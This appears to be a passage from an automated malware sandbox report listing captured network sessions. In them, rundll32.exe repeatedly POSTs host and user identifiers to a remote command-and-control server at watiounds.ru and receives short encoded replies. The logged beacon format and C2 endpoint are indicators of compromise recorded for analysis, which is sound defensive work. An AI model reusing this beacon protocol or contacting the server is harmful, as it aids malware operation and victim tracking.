                                          Data Raw: 63 0d 0a 41 4a 51 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cAJQZARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          286 | 192.168.2.22 | 49451 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:33.836457014 CEST | 355 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:33.959086895 CEST | 355 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:33 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 41 43 58 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cACXZARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          287 | 192.168.2.22 | 49452 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:34.278989077 CEST | 356 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:34.407383919 CEST | 357 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:34 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 54 47 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQTGJARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          288 | 192.168.2.22 | 49453 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:35.085056067 CEST | 357 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:35.229091883 CEST | 358 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:35 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 54 54 47 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cTTGGARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          289 | 192.168.2.22 | 49454 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:35.973766088 CEST | 358 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:36.098089933 CEST | 359 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:36 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 56 4a 51 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cVJQEARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          29 | 192.168.2.22 | 49194 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:36.460486889 CEST | 67 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:36.583070993 CEST | 68 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:36 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 56 45 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZVEAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          290 | 192.168.2.22 | 49455 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:36.412252903 CEST | 360 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:36.535362959 CEST | 360 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:36 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 4a 51 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMJQNARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          291 | 192.168.2.22 | 49456 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:36.859251976 CEST | 361 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:36.985173941 CEST | 361 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:36 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 47 54 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMGTNARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          292 | 192.168.2.22 | 49457 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:37.305062056 CEST | 362 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:37.428684950 CEST | 362 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:37 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 56 45 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMVENARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          293 | 192.168.2.22 | 49458 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:37.743182898 CEST | 363 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:37.865976095 CEST | 363 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:37 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 54 5a 41 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cTZAGARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          294 | 192.168.2.22 | 49459 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:38.171437025 CEST | 364 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:38.294384003 CEST | 364 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:38 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 41 5a 41 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cAZAZARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          295 | 192.168.2.22 | 49460 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:38.622042894 CEST | 365 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:38.749775887 CEST | 365 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:38 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 4d 4e 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYMNBARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          296 | 192.168.2.22 | 49461 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:39.065876961 CEST | 366 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:39.194204092 CEST | 367 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:39 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 4a 51 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQJQJARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          297 | 192.168.2.22 | 49462 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:39.527808905 CEST | 367 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:39.657037973 CEST | 368 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:39 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Ascii: cJJQQARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          298 | 192.168.2.22 | 49463 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:39.978475094 CEST | 369 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:40.108839989 CEST | 369 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:40 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Ascii: cMMNNARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          299 | 192.168.2.22 | 49464 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:40.423877001 CEST | 370 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:40.546618938 CEST | 370 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:40 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Ascii: cBVEYARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          3 | 192.168.2.22 | 49168 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:17:01.770440102 CEST | 9 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:17:01.900310040 CEST | 9 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:17:01 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Ascii: cJVEQARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          30 | 192.168.2.22 | 49195 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:36.905658007 CEST | 69 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:37.028929949 CEST | 69 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:37 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Ascii: cYMNBARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          300 | 192.168.2.22 | 49465 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:40.872823954 CEST | 371 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:41.000818014 CEST | 371 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:40 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Ascii: cBNMYARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          301 | 192.168.2.22 | 49466 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:41.316462994 CEST | 372 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:41.438505888 CEST | 372 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:41 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Ascii: cZYBAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          302 | 192.168.2.22 | 49467 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
